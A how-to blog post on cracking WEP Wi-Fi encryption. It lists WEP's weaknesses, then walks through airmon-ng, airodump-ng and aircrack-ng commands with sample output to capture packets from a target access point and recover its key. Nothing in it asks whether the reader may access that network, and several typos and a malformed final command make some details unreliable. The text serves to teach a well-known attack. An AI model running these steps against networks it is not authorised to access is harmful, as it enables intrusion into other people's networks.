WEP offers protection for data being transferred over the air. It works by providing encryption and authentication. WEB is the oldest of the wireless encryption protocols and it is also the easiest to hack. In this how to we will look into steps necessary to hack WEP protocol.

WEP was developed to provide the following:

  • Protection from eavesdropping on communications and attempts to reduce unauthorized disclosure of data.
  • Encrypt packets prior to transmission with shared secret key
  • Check integrity of data as it flows across the network
  • Provide confidentiality, access control and integrity in a lightweight, efficient system

WEP Vulnerabilities:

  • CRC32(Cyclic Redundancy Check), used in integrity checking, is flawed and with slight modifications packets may be modified consistently by attackers to produce there desired results
  • WEP is susceptible to DOS attacks through the use of associate and disassociate messages, which not authenticated by WEP
  • Keys may be uncovered through the analysts of packets, allowing for the creation of a description table
  • WEP is vulnerable to plain text attacks through the analysts of packets
  • Initialization vectors (IV) are only 24 bits in length, meaning entire pool can be exhausted my moderate use within 5 hours or so

WEP uses initialization vectors. An IV is a randomized value that is used with the secret key for data encryption purposes. Flaws in the generation of IVs in WEB can make it vulnerable to analysis and cracking.

Breaking WEP

First on our laptop we have to make sure wireless adapter is up and running. We are using kali Linux for this but commands should be similar for other distributions also.

iw dev
phy#0
    Interface wlan0
        ifindex 3
        wdev 0x1
        addr .....
        type managed   <---specifies the operational mode of the wireless devices 
        channel 2 ....

Lets run airmon-ng

airmon-ng

PHY	Interface	Driver		Chipset

phy0	wlan0		iwlwifi		Intel Corporation WiFi Link 5100

Enter the following command

airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  492 NetworkManager
  666 wpa_supplicant
  782 dhclient

PHY	Interface	Driver		Chipset

phy0	wlan0		iwlwifi		Intel Corporation WiFi Link 5100

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

Now run again iw dev command to make sure adapter is in monitor mode

iw dev
phy#0
	Interface wlan0mon
		ifindex 4
		wdev 0x2
		addr 00:22:fb:17:e2:a2
		type monitor
		channel 10 (2457 MHz), width: 20 MHz (no HT), center1: 2457 MHz

Start airodump-ng to start scanning

 airodump-ng wlan0mon

You should see list of access points around your area

                    
                                                                               
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                          
 84:9x:8C:9D:BC:38  -22      922     3717    0   2  54  WEP WEP          H1   
 08:0x:81:CE:83:FB  -46      203        0    0  11  54e  WPA2 CCMP   PSK  

As you can see access point with SSID H1 running WEP
Enter the following command specifying -w file where we dump results, -c channel number

airodump-ng -w result.txt -c 2 -b 84:9x:8C:9D:BC:38 wlan0mon

We will need to capture close to 15000 packets for this to sucseed
Now lets run this command to crack the key

aircrack-ng result.txt-01.cap

Here is one more way to run data capture

airodump-ng -c 11 resultnew wlan0mon